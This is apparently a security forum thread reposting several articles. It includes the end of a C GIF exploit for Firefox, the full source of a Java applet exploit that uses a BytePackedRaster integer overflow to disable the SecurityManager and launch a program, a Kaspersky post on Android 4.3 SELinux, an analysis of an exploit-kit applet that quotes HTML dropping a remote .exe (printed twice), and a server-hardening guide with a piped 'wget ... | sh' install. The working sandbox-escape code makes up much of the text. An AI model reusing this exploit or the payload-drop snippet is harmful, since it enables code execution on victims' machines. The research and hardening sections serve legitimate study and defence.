i++) { gif_header.image1.image_data = 0xFF;//data1; }*/ // RASTER DATA // second image frame's last byte ignored ( null terminatee, GIF total trailer ) //gif_header.image1.terminator2 = '\x00'; //gif_header.trailler = ';'; // -------------------------------------------------- fp = fopen("a.gif", "wb"); printf("%d\n", sizeof(struct _GIF_HEADER)); fwrite(&gif_header, sizeof(struct _GIF_HEADER) - 1, 1, fp); fclose(fp); system("xxd ./a.gif"); } Sursa: Mozilla Firefox 3.5.4 - Local Color Map Exploit
  13. Packet Storm Exploit 2013-0819-1 - Oracle Java BytePackedRaster.verify() Signed Integer Overflow Site packetstormsecurity.com The BytePackedRaster.verify() method in Oracle Java versions prior to 7u25 is vulnerable to a signed integer overflow that allows bypassing of "dataBitOffset" boundary checks. This exploit code demonstrates remote code execution by popping calc.exe. It was obtained through the Packet Storm Bug Bounty program. import java.awt.CompositeContext;import java.awt.image.*; import java.awt.color.*; import java.beans.Statement; import java.security.*; public class MyJApplet extends javax.swing.JApplet { /** * Initializes the applet myJApplet */ @Override public void init() { /* Set the Nimbus look and feel */ //<editor-fold defaultstate="collapsed" desc=" Look and feel setting code (optional) "> /* If Nimbus (introduced in Java SE 6) is not available, stay with the default look and feel. * For details see http://download.oracle.com/javase/tutorial/uiswing/lookandfeel/plaf.html */ try { for (javax.swing.UIManager.LookAndFeelInfo info : javax.swing.UIManager.getInstalledLookAndFeels()) { if ("Nimbus".equals(info.getName())) { javax.swing.UIManager.setLookAndFeel(info.getClassName()); break; } } } catch (ClassNotFoundException ex) { java.util.logging.Logger.getLogger(MyJApplet.class.getName()).log(java.util.logging.Level.SEVERE, null, ex); } catch (InstantiationException ex) { java.util.logging.Logger.getLogger(MyJApplet.class.getName()).log(java.util.logging.Level.SEVERE, null, ex); } catch (IllegalAccessException ex) { java.util.logging.Logger.getLogger(MyJApplet.class.getName()).log(java.util.logging.Level.SEVERE, null, ex); } catch (javax.swing.UnsupportedLookAndFeelException ex) { java.util.logging.Logger.getLogger(MyJApplet.class.getName()).log(java.util.logging.Level.SEVERE, null, ex); } //</editor-fold> /* Create and display the applet */ try { java.awt.EventQueue.invokeAndWait(new Runnable() { public void run() { initComponents(); // print environment info logAdd( "JRE: " + System.getProperty("java.vendor") + " " + System.getProperty("java.version") + "\nJVM: " + System.getProperty("java.vm.vendor") + " " + System.getProperty("java.vm.version") + "\nJava Plug-in: " + System.getProperty("javaplugin.version") + "\nOS: " + System.getProperty("os.name") + " " + System.getProperty("os.arch") + " (" + System.getProperty("os.version") + ")" ); } }); } catch (Exception ex) { ex.printStackTrace(); } } public void logAdd(String str) { txtArea.setText(txtArea.getText() + str + "\n"); } public void logAdd(Object o, String... str) { logAdd((str.length > 0 ? str[0]:"") + (o == null ? "null" : o.toString())); } public String errToStr(Throwable t) { String str = "Error: " + t.toString(); StackTraceElement[] ste = t.getStackTrace(); for(int i=0; i < ste.length; i++) { str += "\n\t" + ste.toString(); } t = t.getCause(); if (t != null) str += "\nCaused by: " + errToStr(t); return str; } public void logError(Exception ex) { logAdd(errToStr(ex)); } public static String toHex(int i) { return Integer.toHexString(i); } /** * This method is called from within the init() method to initialize the * form. WARNING: Do NOT modify this code. The content of this method is * always regenerated by the Form Editor. */ @SuppressWarnings("unchecked") // <editor-fold defaultstate="collapsed" desc="Generated Code">//GEN-BEGIN:initComponents private void initComponents() { btnStart = new javax.swing.JButton(); jScrollPane2 = new javax.swing.JScrollPane(); txtArea = new javax.swing.JTextArea(); btnStart.setText("Run calculator"); btnStart.addMouseListener(new java.awt.event.MouseAdapter() { public void mousePressed(java.awt.event.MouseEvent evt) { btnStartMousePressed(evt); } }); txtArea.setEditable(false); txtArea.setColumns(20); txtArea.setFont(new java.awt.Font("Arial", 0, 12)); // NOI18N txtArea.setRows(5); txtArea.setTabSize(4); jScrollPane2.setViewportView(txtArea); javax.swing.GroupLayout layout = new javax.swing.GroupLayout(getContentPane()); getContentPane().setLayout(layout); layout.setHorizontalGroup( layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGroup(layout.createSequentialGroup() .addContainerGap() .addComponent(jScrollPane2, javax.swing.GroupLayout.DEFAULT_SIZE, 580, Short.MAX_VALUE) .addContainerGap()) .addGroup(layout.createSequentialGroup() .addGap(242, 242, 242) .addComponent(btnStart, javax.swing.GroupLayout.PREFERRED_SIZE, 124, javax.swing.GroupLayout.PREFERRED_SIZE) .addContainerGap(javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)) ); layout.setVerticalGroup( layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGroup(javax.swing.GroupLayout.Alignment.TRAILING, layout.createSequentialGroup() .addContainerGap() .addComponent(jScrollPane2, javax.swing.GroupLayout.DEFAULT_SIZE, 344, Short.MAX_VALUE) .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.UNRELATED) .addComponent(btnStart) .addContainerGap()) ); }// </editor-fold>//GEN-END:initComponents private boolean _isMac = System.getProperty("os.name","").contains("Mac"); private boolean _is64 = System.getProperty("os.arch","").contains("64"); private int tryExpl() { try { // alloc aux vars String name = "setSecurityManager"; Object[] o1 = new Object[1]; Object o2 = new Statement(System.class, name, o1); // make a dummy call for init // allocate byte buffer for destination Raster DataBufferByte dst = new DataBufferByte(9); // allocate the target array right after dst[] int[] a = new int[8]; // allocate an object array right after a[] Object[] oo = new Object[7]; // create Statement with the restricted AccessControlContext oo[2] = new Statement(System.class, name, o1); // create powerful AccessControlContext Permissions ps = new Permissions(); ps.add(new AllPermission()); oo[3] = new AccessControlContext( new ProtectionDomain[]{ new ProtectionDomain( new CodeSource( new java.net.URL("file:///"), new java.security.cert.Certificate[0] ), ps ) } ); // store System.class pointer in oo[] oo[4] = ((Statement)oo[2]).getTarget(); // save old a.length int oldLen = a.length; logAdd("a.length = 0x" + toHex(oldLen)); // prepare source buffer DataBufferByte src = new DataBufferByte(8); for(int i=0; i<8; i++) src.setElem(i,-1); // create normal source raster MultiPixelPackedSampleModel sm1 = new MultiPixelPackedSampleModel(DataBuffer.TYPE_BYTE, 4,1,1,4,0); WritableRaster wr1 = Raster.createWritableRaster(sm1, src, null); // create MultiPixelPackedSampleModel with malformed "scanlineStride" and "dataBitOffset" fields MultiPixelPackedSampleModel sm2 = new MultiPixelPackedSampleModel(DataBuffer.TYPE_BYTE, 4,2,1, 0x3fffffdd - (_is64 ? 16:0), 288 + (_is64 ? 128:0)); // create destination BytePackedRaster basing on sm2 WritableRaster wr2 = Raster.createWritableRaster(sm2, dst, null); logAdd(wr2); // create sun.java2d.SunCompositeContext byte[] bb = new byte[] { 0, -1 }; IndexColorModel cm = new IndexColorModel(1, 2, bb, bb, bb); CompositeContext cc = java.awt.AlphaComposite.Src.createContext(cm, cm, null); logAdd(cc); // call native Java_sun_awt_image_BufImgSurfaceData_initRaster() (see ...\jdk\src\share\native\sun\awt\image\BufImgSurfaceData.c) // and native Java_sun_java2d_loops_Blit_Blit() (see ...\jdk\src\share\native\sun\java2d\loops\Blit.c) cc.compose(wr1, wr2, wr2); // check results: a.length should be overwritten by 0xF8 int len = a.length; logAdd("a.length = 0x" + toHex(len)); if (len == oldLen) { // check a[] content corruption // for RnD for(int i=0; i < len; i++) if (a != 0) logAdd("a["+i+"] = 0x" + toHex(a)); // exit logAdd("error 1"); return 1; } // ok, now we can read/write outside the real a[] storage, // lets find our Statement object and replace its private "acc" field value // search for oo[] after a[oldLen] boolean found = false; int ooLen = oo.length; for(int i=oldLen+2; i < oldLen+32; i++) if (a[i-1]==ooLen && a==0 && a[i+1]==0 // oo[0]==null && oo[1]==null && a[i+2]!=0 && a[i+3]!=0 && a[i+4]!=0 // oo[2,3,4] != null && a[i+5]==0 && a[i+6]==0) // oo[5,6] == null { // read pointer from oo[4] int stmTrg = a[i+4]; // search for the Statement.target field behind oo[] for(int j=i+7; j < i+7+64; j++){ if (a[j] == stmTrg) { // overwrite default Statement.acc by oo[3] ("AllPermission") a[j-1] = a[i+3]; found = true; break; } } if (found) break; } // check results if (!found) { // print the memory dump on error // for RnD String s = "a["+oldLen+"...] = "; for(int i=oldLen; i < oldLen+32; i++) s += toHex(a) + ","; logAdd(s); } else try { // show current SecurityManager logAdd(System.getSecurityManager(), "Security Manager = "); // call System.setSecurityManager(null) ((Statement)oo[2]).execute(); // show results: SecurityManager should be null logAdd(System.getSecurityManager(), "Security Manager = "); } catch (Exception ex) { logError(ex); } logAdd(System.getSecurityManager() == null ? "Ok.":"Fail."); } catch (Exception ex) { logError(ex); } return 0; } private void btnStartMousePressed(java.awt.event.MouseEvent evt) {//GEN-FIRST:event_btnStartMousePressed try { logAdd("===== Start ====="); // try several attempts to exploit for(int i=1; i <= 5 && System.getSecurityManager() != null; i++){ logAdd("Attempt #" + i); tryExpl(); } // check results if (System.getSecurityManager() == null) { // execute payload Runtime.getRuntime().exec(_isMac ? "/Applications/Calculator.app/Contents/MacOS/Calculator":"calc.exe"); } logAdd("===== End ====="); } catch (Exception ex) { logError(ex); } }//GEN-LAST:event_btnStartMousePressed // Variables declaration - do not modify//GEN-BEGIN:variables private javax.swing.JButton btnStart; private javax.swing.JScrollPane jScrollPane2; private javax.swing.JTextArea txtArea; // End of variables declaration//GEN-END:variables } Download: http://packetstormsecurity.com/files/download/122865/PSA-2013-0819-1-exploit.tgz Sursa: Packet Storm Exploit 2013-0819-1 - Oracle Java BytePackedRaster.verify() Signed Integer Overflow ? Packet Storm
  14. [h=1]Android 4.3 and SELinux[/h]Stefano Ortolani Kaspersky Lab Expert Posted August 17, 18:20 GMT Not many weeks ago Google released a new revision of its flagship mobile operating system, Android 4.3. Although some say that this time updates have been quite scarce, from a security perspective there have been some undeniable improvements (among others, the "MasterKey" vulnerability has been finally patched). One of the most prominent is SELinux. Many cheered the event as a long-awaited move, while others criticized its implementation. Personally, I think that the impact is not that easy to assess, especially if we were to question the benefits for end-users. In order to shed some light we can't help but analyze a bit more what SELinux is, and what is its threat model. Let's start from the basics: the security of any Linux-based system is built upon the concept of Discretionary Access Control (DAC), meaning that each user decides which of his own files is accessed (read, written, or executed) by other users. The system itself is protected from tampering by having all system files owned by the administrative user 'root'. Android is based on the very same concepts, but with a small but compelling addition: each app is assigned a different user ID (some exceptions are possible though), thereby isolating and protecting the application data from all other applications. This is the reason why on un-rooted devices it is quite difficult, if not impossible, for a legit application to steal the private data used by another application (unless, obviously, that data is set world-readable). gattaca Users $ ls -las total 0 0 drwxr-xr-x 6 root admin 204 Aug 24 2012 . 0 drwxr-xr-x 31 root wheel 1122 Aug 16 12:56 .. 0 -rw-r--r-- 1 root wheel 0 Jun 20 2012 .localized 0 drwxr-xr-x+ 11 Guest _guest 374 Aug 24 2012 Guest 0 drwxrwxrwt 7 root wheel 238 Apr 9 15:58 Shared 0 drwxr-xr-x+ 87 stefano staff 2958 Aug 11 10:35 stefano DAC means that access to file and resources is defined in terms user and file/directory modes. SELinux builds on top of that (and on 15 years of NSA's OS security research), and introduces another security layer termed Mandatory Access Control (MAC). This layer, configured by system-wide policies, further regulates how users (and thus apps on Android devices) access both their and the system-provided data, all this in a transparent manner. In more technical terms, it is possible to design policies that are able to specify the types of interactions a process configured to be part of a security context can and can not do. A simple, but yet effective, example is the case of a system log daemon running with root privileges (ouch). With SELinux we can configure the entire system such that the process can not access anything but the log file: we would simply need to assign a specific label to the log file, and write a policy allowing the log daemon to access only those files so-labeled (as always, consider that things are a bit more complex than that . Note the two advantages coming from this mindset: (1) the policy is something that can be enforced system-wide (and even root has to abide by it); (2) the permissions are much much more fine-grained than those possibly enforced by the DAC. The ability of limiting what the super-user can do (regardless of its privileges) is pivotal to protect the system from privilege escalation attacks. This is in fact where SELinux excels. Let's take the case of Gingerbreak, a wide-spread exploit to root Gingerbread-based devices. The exploit sends a carefully crafted netlink message to the volume daemon (vold) running as root. Due to some missing bound-checks that message can lead to successful code injection and execution. Since the process runs as root, it is in fact trivial to spawn a setuid-root shell and from there taking control of the device. SELinux would have stopped that exploit by denying the very same message: the default policy (at least in the original patch-set) denies opening that type of socket, so problem solved. If that was not enough, execution of non-system binaries through that daemon process can be further denied by another SELinux policy. shell@tilapia:/ # ls -Z /system/ drwxr-xr-x root root u:object_r:unlabeled:s0 app drwxr-xr-x root shell u:object_r:unlabeled:s0 bin drwxr-xr-x root root u:object_r:unlabeled:s0 etc ... Unlabeled FS after OTA update. Awesome, right? Unfortunately, reality is still quite far from that. The SELinux implementation that is currently deployed on stock Android 4.3 images is missing several important features. First off, SELinux is configured in Permissive mode only, meaning that policies are not enforced, and violations are just being logged (not that useful but for testing). Also, as shown above, the OTA update does not label the system partition correctly (my testing device left me puzzled for quite a while till I found that the researcher Pau Oliva published the exact same finding at DEF CON 21), meaning that a stock-restore is mandatory if a developer is to test it. Finally, besides the fact that the provided policies are anything but restrictive, no MAC is available for the Android middleware (a feature instead part of the NSA's patch-set). What does it mean to the end-user then? Unfortunately, as of now, not much. SELinux as deployed on Android 4.3 can only be tested and policies developed. There is also no safe way to enforce it. Now it is in fact OEM vendors' time. Google is strongly encouraging the development of SELinux implementations (BYOD anyone?) based on stock functionalities rather than on poorly assembled add-ons (see again the talk given at DEFCON 21 for a comprehensive explanation of what "implementation issues" might mean). Developers, on the other hand, are strongly encouraged to get accustomed with the default set of policies, and test their apps for breakage. Will we ever see an Android release with SELinux set to enforce mode? That we can only hope Sursa: https://www.securelist.com/en/blog/9175/Android_4_3_and_SELinux
  15. Anti-decompiling techniques in malicious Java Applets Step 1: How this started While I was investigating the Trojan.JS.Iframe.aeq case (see blogpost < http://www.securelist.com/en/blog?weblogid=9151>) one of the files dropped by the Exploit Kit was an Applet exploiting a vulnerability: <script> document.write('<applet archive="dyJhixy.jar" code="QPAfQoaG.ZqnpOsRRk"><param value="http://fast_DELETED_er14.biz/zHvFxj0QRZA/04az-G112lI05m_AF0Y_C5s0Ip-Vk05REX_0AOq_e0skJ/A0tqO-Z0hT_el0iDbi0-4pxr17_11r_09ERI_131_WO0p-MFJ0uk-XF0_IOWI07_Xsj_0ZZ/8j0A/qql0alP/C0o-lKs05qy/H0-nw-Q108K_l70OC-5j150SU_00q-RL0vNSy/0kfAS0X/rmt0N/KOE0/zxE/W0St-ug0vF8-W0xcNf0-FwMd/0KFCi0MC-Ot0z1_kP/0wm470E/y2H0nlwb14-oS8-17jOB0_p2TQ0/eA3-o0NOiJ/0kWpL0LwBo0-sCO_q0El_GQ/roFEKrLR7b.exe?nYiiC38a=8Hx5S" name="kYtNtcpnx"/></applet>'); </script> Step 2: First analysis So basically I unzipped the .jar and took a look using JD-GUI, a java decompiler. These were the resulting classes inside the .jar file: The class names are weird, but nothing unusual. Usually the Manifest states the entry point (main class) of the applet. In this case there was no manifest, but we could see this in the applet call from the html: <applet archive="dyJhixy.jar" code="QPAfQoaG.ZqnpOsRRk"> << Package and Class to execute <param value="http:// fast_DELETED_er14.biz/zHvFxj0QRZA/04az-G112lI05m_AF0Y_C5s0Ip-Vk05REX_0AOq_e0skJ/A0tqO-Z0hT_el0iDbi0-4pxr17_11r_09ERI_131_WO0p-MFJ0uk-XF0_IOWI07_Xsj_0ZZ/8j0A/qql0alP/C0o-lKs05qy/H0-nw-Q108K_l70OC-5j150SU_00q-RL0vNSy/0kfAS0X/rmt0N/KOE0/zxE/W0St-ug0vF8-W0xcNf0-FwMd/0KFCi0MC-Ot0z1_kP/0wm470E/y2H0nlwb14-oS8-17jOB0_p2TQ0/eA3-o0NOiJ/0kWpL0LwBo0-sCO_q0El_GQ/roFEKrLR7b.exe?nYiiC38a=8Hx5S" The third parameter was the .exe that the applet drops. There was no real need to explore any more deeply just to get an overview of what the applet does. However the point here was to analyze the vulnerability that this .jar file exploits. At this point I should say that I was biased. I had read a McAfee report (http://kc.mcafee.com/resources/sites/MCAFEE/content/live/PRODUCT_DOCUMENTATION/24000/PD24588/en_US/McAfee_Labs_Threat_Advisory_STYX_Exploit_Kit.pdf) about a similar campaign using the same Exploit kit. In this report they said that the malware dropped by this particular HTML inside the kit was CVE-2013-0422. Usually the first clue which might confirm this would be verdicts from AV vendors, but this time it was not the case: https://www.virustotal.com/es/file/e6e27b0ee2432e2ce734e8c3c1a199071779f9e3ea5b327b199877b6bb96c651/analysis/1375717187/ Ok, so let's take a look at the decompiled code, starting from the entry point. We can confirm that the ZqnpOsRRk class is implementing the Applet: package QPAfQoaG;import java.applet.Applet; import java.lang.reflect.Constructor; import java.lang.reflect.Method; public class ZqnpOsRRk extends Applet Anti-decompiling techniques in malicious Java Applets Step 1: How this started While I was investigating the Trojan.JS.Iframe.aeq case (see blogpost < http://www.securelist.com/en/blog?weblogid=9151>) one of the files dropped by the Exploit Kit was an Applet exploiting a vulnerability: <script> document.write('<applet archive="dyJhixy.jar" code="QPAfQoaG.ZqnpOsRRk"><param value="http://fast_DELETED_er14.biz/zHvFxj0QRZA/04az-G112lI05m_AF0Y_C5s0Ip-Vk05REX_0AOq_e0skJ/A0tqO-Z0hT_el0iDbi0-4pxr17_11r_09ERI_131_WO0p-MFJ0uk-XF0_IOWI07_Xsj_0ZZ/8j0A/qql0alP/C0o-lKs05qy/H0-nw-Q108K_l70OC-5j150SU_00q-RL0vNSy/0kfAS0X/rmt0N/KOE0/zxE/W0St-ug0vF8-W0xcNf0-FwMd/0KFCi0MC-Ot0z1_kP/0wm470E/y2H0nlwb14-oS8-17jOB0_p2TQ0/eA3-o0NOiJ/0kWpL0LwBo0-sCO_q0El_GQ/roFEKrLR7b.exe?nYiiC38a=8Hx5S" name="kYtNtcpnx"/></applet>'); </script> Step 2: First analysis So basically I unzipped the .jar and took a look using JD-GUI, a java decompiler. These were the resulting classes inside the .jar file: The class names are weird, but nothing unusual. Usually the Manifest states the entry point (main class) of the applet. In this case there was no manifest, but we could see this in the applet call from the html: <applet archive="dyJhixy.jar" code="QPAfQoaG.ZqnpOsRRk"> << Package and Class to execute <param value="http:// fast_DELETED_er14.biz/zHvFxj0QRZA/04az-G112lI05m_AF0Y_C5s0Ip-Vk05REX_0AOq_e0skJ/A0tqO-Z0hT_el0iDbi0-4pxr17_11r_09ERI_131_WO0p-MFJ0uk-XF0_IOWI07_Xsj_0ZZ/8j0A/qql0alP/C0o-lKs05qy/H0-nw-Q108K_l70OC-5j150SU_00q-RL0vNSy/0kfAS0X/rmt0N/KOE0/zxE/W0St-ug0vF8-W0xcNf0-FwMd/0KFCi0MC-Ot0z1_kP/0wm470E/y2H0nlwb14-oS8-17jOB0_p2TQ0/eA3-o0NOiJ/0kWpL0LwBo0-sCO_q0El_GQ/roFEKrLR7b.exe?nYiiC38a=8Hx5S" The third parameter was the .exe that the applet drops. There was no real need to explore any more deeply just to get an overview of what the applet does. However the point here was to analyze the vulnerability that this .jar file exploits. At this point I should say that I was biased. I had read a McAfee report (http://kc.mcafee.com/resources/sites/MCAFEE/content/live/PRODUCT_DOCUMENTATION/24000/PD24588/en_US/McAfee_Labs_Threat_Advisory_STYX_Exploit_Kit.pdf) about a similar campaign using the same Exploit kit. In this report they said that the malware dropped by this particular HTML inside the kit was CVE-2013-0422. Usually the first clue which might confirm this would be verdicts from AV vendors, but this time it was not the case: https://www.virustotal.com/es/file/e6e27b0ee2432e2ce734e8c3c1a199071779f9e3ea5b327b199877b6bb96c651/analysis/1375717187/ Ok, so let's take a look at the decompiled code, starting from the entry point. We can confirm that the ZqnpOsRRk class is implementing the Applet: package QPAfQoaG; import java.applet.Applet; import java.lang.reflect.Constructor; import java.lang.reflect.Method; public class ZqnpOsRRk extends Applet But quickly we see that something is not working. The names of the classes and methods are random and the strings obfuscated, but this is nothing to worry about. However in this case we see that the decompiler is showing strange “code”: public ZqnpOsRRk() { (-0.0D); return; 1L; 2; 1; } Or it is not able to decompile methods of the class directly and is just showing up the bytecode as comments: public void ttiRsuN() throws Throwable {// Byte code: // 0: ldc_w 10 // 3: iconst_4 // 4: ineg // 5: iconst_5 // 6: ineg // 7: pop2 // 8: lconst_0 // 9: pop2 Now I was starting to wonder how bad the situation was? Could I still get enough information to discover which CVE is exploited by this .jar? Time for some serious digging! I started to rename the classes based on their first letters (ZqnpOsRRk to Z, CvSnABr to C, etc) and to match the methods with what I thought they were doing. It’s much like any RE using IDA. There was a lot of “strange” code around, which got strange interpretations from the decompiler. I decided to delete it to tidy up the task. Of course, there was a risk that I might delete something important, but this time it looked like misinterpretations of the bytecode, dead code and unused variables. So I deleted things like: public static String JEeOqvmFU(Class arg0) { (-5); (-2.0F); return 1;Where I saw commented bytecode (not decompiled by JD-GUI), I deleted everything but the references to functions/classes. At the end I had a much cleaner code, but I was very worried that I might be missing important parts. For instance, I had procedures which just returned NULL, function which just declared variables, unused variables, etc. How much of this, if any, was part of the expolit and how much was just badly interpreted code? At least I was able to get something useful after cleaning the code. I was able to localize the function used to deobfuscate the strings: public static String nwlavzoh(String mbccvkha) {byte[] arrayOfByte1 = mbccvkha.getBytes(); byte[] arrayOfByte2 = new byte[arrayOfByte1.length]; for (int i = 0; i < arrayOfByte1.length; i++) arrayOfByte2 = ((byte)(arrayOfByte1 ^ 0x44)); return new String(arrayOfByte2); } Not exactly rocket science. Now I could decompile all the strings, but I still didn't have a clear idea of what was happening in this .jar. Step 2: Different strategy Seeing that the code was not decompiled properly I remembered that to check which vulnerability is being exploited you don’t really need a fully decompiled code. Finding the right clues can point you to the right exploit. At this point I thought that it might be CVE-2013-0422, so I decided to get more information about this vulnerability and see if I could find something in the code to confirm this. This CVE was discovered in January 2013. Oracle was having a bad time just then, and shortly afterwards a few other Java vulnerabilities were exposed. I downloaded a few samples from VirusTotal with this CVE. All of them were easily decompiled and I saw some ways to implement this vulnerability. But there was no big clue. I decided also to try a few other decompilers, but still got no results. However when taking a second look at the results of running a now-obsolete JAD I saw that the decompiled code was quite different from the one of JD-GUI, even though it was still incomplete and unreadable. But there were different calls with obfuscated strings to the deobfuscation function. The applet uses a class loader with the obfuscated strings to avoid detection, making it difficult to know what it is loading without the properly decompiled strings. But now I had all of them! After running the script I got: com.sun.jmx.mbeanserver.JmxMBeanServernewMBeanServer javax.management.MbeanServerDelegateboolean getMBeanInstantiator findClass sun.org.mozilla.javascript.internal.Context com.sun.jmx.mbeanserver.Introspector createClassLoader Now this was much more clear and familiar to me. I had another look at one of the PDFs I was just reading and bingo! https://partners.immunityinc.com/idocs/Java%20MBeanInstantiator.findClass%200day%20Analysis.pdf So finally I could confirm the CVE was indeed CVE-2013-0422. Step 3: Why didn’t the Java Decompiler work? In these cases it is always possible to take another approach and do some dynamic analysis debugging the code. If you want to go this way I recommend reading this for the setup: Understanding Java Code and Malware | Malwarebytes Unpacked However, I couldn't stop thinking about why all the decompilers failed with this code. Let's take a look at the decompiled bytecode manually. We can easily get it like this: javap -c -classpath LOCAL_PATH ZqnpOsRRk > ZqnpOsRRk.bytecode Let's take a look to the code we get and what it means, with an eye on the decompiled code. We will need this: Java bytecode instruction listings - Wikipedia, the free encyclopedia public QPAfQoaG.ZqnpOsRRk(); 0: aload_0 1: invokespecial #1; //Method java/applet/Applet."<init>":()V 4: dconst_0 << push 0D 5: dneg << -0D 6: pop2 << pop -0D 7: nop 8: return 9: lconst_1 <<deadcode_from_here 10: pop2 11: goto 14 14: iconst_2 15: iconst_2 16: pop2 17: iconst_1 18: pop and the decompiled code with the corresponding instruction numbers: public class ZqnpOsRRk extends Applet { public ZqnpOsRRk() { (-0.0D); return; 1L; 2; 1; } So we can see how a method which just provides returns leaves a lot of garbage in the middle. The decompiler cannot handle this and tries to interpret all these operations, these anti-decompilation artifacts. It just adds a lot of extra noise to the final results. We can safely delete all this. public class ZqnpOsRRk extends Applet { public ZqnpOsRRk() { return; } There are TONS of these artifacts in the bytecode. Here a few examples: 1: lconst_0 2: lneg 3: pop2 1: iconst_5 2: ineg 3: iconst_1 4: ineg 5: pop2 1: iconst_5 2: ineg 3: iconst_5 4: swap 5: pop2 There are also a lot of nonsense jumps, such as push NULL then jump if null, gotos and nops. Basically it’s difficult to delete these constructors from the bytecode because the parameters are different and don’t always throw up the same opcodes. It’s up to the decompiler to get rid of this dead code. After a couple of hours manually cleaning the code and reconstructing it from the bytecodes, I could finally read the result and compare it with the original decompiled one. Now I understood what was happening and what was wrong with the original code I could safely delete the dead code and introduce readable names for classes and methods. But there was still one unanswered question: why was the first decompiler unable to deobfuscate all the strings, and why did I have to use JAD to get everything? JD-GUI returns the bytecode of the methods that it cannot decompile but for instructions such as ldc (that puts a constant onto the stack) it does not include the constant along with the instruction in the output code. That's why I couldn't get them until I used a second decompiler. For example: JD-GUI output: // 18: ldc 12 Bytecode output: 18: ldc #12; //String '+)j71*j.)<j)&!%*7!62!6j^N)<t^F!%*^W!62!6 JAD output: class1 = classloader.loadClass(CvSnABr.nwlavzoh("'+)j71*j.)<j)&!%*7!62!6j16)<t06!%*27!62!6")); In the bytecode, happily, we can find all these references and complete the job. Final thoughts When I was working in this binary I remembered a presentation in BH 2012 about anti-decompiling techniques used for Android binaries. This was the first time I had personally encountered a Java binary implementing something similar. Even they are not that difficult to avoid, the analysis is much slower and it can be really hard to crack big binaries. So there are two open questions: first, what can be done, from the decompiler’s perspective, to avoid these tricks? I’m hoping to discuss this with the authors of JD-GUI. Secondly, how can we make code “undecompilable”? Are there automatic tools for this? Again, I’m hoping to find out more, but please contact me if you have anything useful to share. Sursa: https://www.securelist.com/en/analysis/204792300/Anti_decompiling_techniques_in_malicious_Java_Applets
  16. WEB SERVER SECURITY Rohit Shaw August 16, 2013 This article gives you a short and understandable summary about web servers, the different types of servers, the security add-on software installation process, and security aspects In this article we will learn the installation of a control panel and a benefits of add-on security software. Web servers, just as a general introduction, are the big computers that serve as website hosts for a particular organization. The common characteristics that web servers have are public IP addresses and domain names. This information may sound boring but is offered for beginners. Security is a standard that has developed to protect the web server from intrusions, hacking attempts, and other malicious uses. A brief introduction to the types of web servers: There are those based on Microsoft Windows and those based on Linux, which are respectively named Microsoft IIS Server and Apache (these are the most common, although there are others like Nginx, Cherokee, and Zeus, etc). Throughout my article, I will introduce the techniques of hardening a web server, which is a chief role in web server security. The attack vectors on a web server depend on both the web application security that is hosted on the web server and the web server security, which includes operating system hardening, application server hardening, etc). Starting with the web server security, the first point of analysis for exploiting the server would be the services. I would suggest all the server security administrators should run a service to check on all the ports that are open, filtered, and closed. One of the best tools would be Nmap for scanning the network. Use a control panel for managing the hosted websites on the server. There are many control panels available, such as cPanel, Parallel Plesks, DirectAdmin, Webmin, ISPconfig, Virtualmin, etc. The chief benefit of using a control panel is that it provides a graphical web-based interface with a client-side interface. It is extremely easy to navigate, with an icon-based menu on the main page. A server administrator can use a control panel to set up new websites, email accounts and DNS entries. With the control panel, you can also upgrade and install new software. After that, install Atomic Secured Linux (ASL) in your web server; it is an add-on for Linux systems. We will discuss ASL later in this article. Now I am going to show you how to set up a control panel on a web server. Here we are going to install cPanel and WHM (Web Host Manager). cPanel Setup Manual Prerequisites: Before installing cPanel we need to fulfill some conditions: Your IP must be static before purchasing cPanel. It will not work properly with a dynamic IP address. The hostname on your server must be a fully qualified host name (FQHN); for example, web.domain.com. You can change the “hostname=” line in etc/sysconfig/network and then you must restart your network. Hostname Change:For changing the host name, there are usually three steps, as follows: Sysconfig/Network—Open the /etc/config/network file with any text editor. Modify the HOSTNAME=value to match your FQHN host name. # vi /etc/sysconfig/network HOSTNAME=myserver.domain.com Host file—Change the host that is associated with your main IP addresses for your server; this is for internal networking. (Found at /etc/hosts) Run hostname—This command allows modifying the hostname on the server, but it will not actively update all programs that are running under the old hostname. Restart Networking: After completing the above prerequisites and requirements we are done and we just give a reboot to the system to accept the changes. We can reboot by using this command: # /etc/init.d/network restart Downloading cPanel: After registering your IP, we have to input a command as root user in the terminal; that is, wget http://www.layer1.cpanel.net/latest cPanel Installation: After downloading the installer file, type in the following command as root user:sh latest After the install is complete, you should see this: “cPanel Layer 2 install complete.” Now point your web browser to port 2086 0r 2087 by providing your IP address directly in the web browser: https://youriphere:2087 NOTE: There is no method of uninstalling cPanel. You will have to reload the operating system. Now, after installing cPanel, the server is safe from rooting attacks, which hackers use for compromising all websites that are hosted on the same server. But the main critical threats are PHP shell execution and the DDoS attack on the server, which are not prevented by using a cPanel. So we just started looking for an anti-DDoS solution on the Internet and we found one, called as Atomic Secured Linux. Atomic Secured Linux Atomic Secured Linux is an easy-to-use, out-of-the-box unified security suite add-on for Linux systems, designed to protect servers against zero-day threats. Unlike other security solutions, ASL is designed for beginners and experts alike. You just install ASL on your existing system and it does all the work for you. This add-on was developed to create a unique security solution for beginners and experts ASL works by combining security at all layers, from the firewall to the applications and services and all the way down to the kernel, to provide the most complete multi-spectrum protection solution available for Linux servers today. It helps to ensure that your system is secure and also compliant with commercial and government security standards. Features Complete intrusion prevention Stateful firewall Real-time shunning/firewalling and blocking of attack sources Brute force attack detection and prevention Automatic self-healing system Automated file upload scanning protection Built-in vulnerability and compliance scanner and remediation system Suspicious event detection and notification Denial of service protection Malware/antivirus protection Auto-learning role-based access control Data loss protection and real-time web content redaction system Automated secure log management with secure remote logging Web based GUI management Kernel protection Built-in virtualization Auto healing/hardening Atomic Secured Linux works on various platforms, such as CentOS, Red Hat Enterprise Linux, Scientific Linux, Oracle Linux, and Cloud Linux. It also supports many control panels, including cPanel, Virtualmin, DirectAdmin, Webmin, and Parallel Plesk. Now I am going to show you how to install Atomic Secured Linux. It is quite easy to install. Open the terminal for root use and type in: wget -q -O – https://www.atomicorp.com/installers/asl |sh Follow the instructions in the installer, being sure to answer the configuration questions appropriately for your system. Once the installation is complete, you will need to reboot your system to boot into the new hardened kernel that comes with ASL. You do not have to use this kernel to enjoy the other features of ASL, but we recommend that you use it, because it includes many additional security features that are not found in non-ASL system. Now log in to your GUI at https://youriphere:30000.You can view alerts, block attackers, configure ASL, and use its 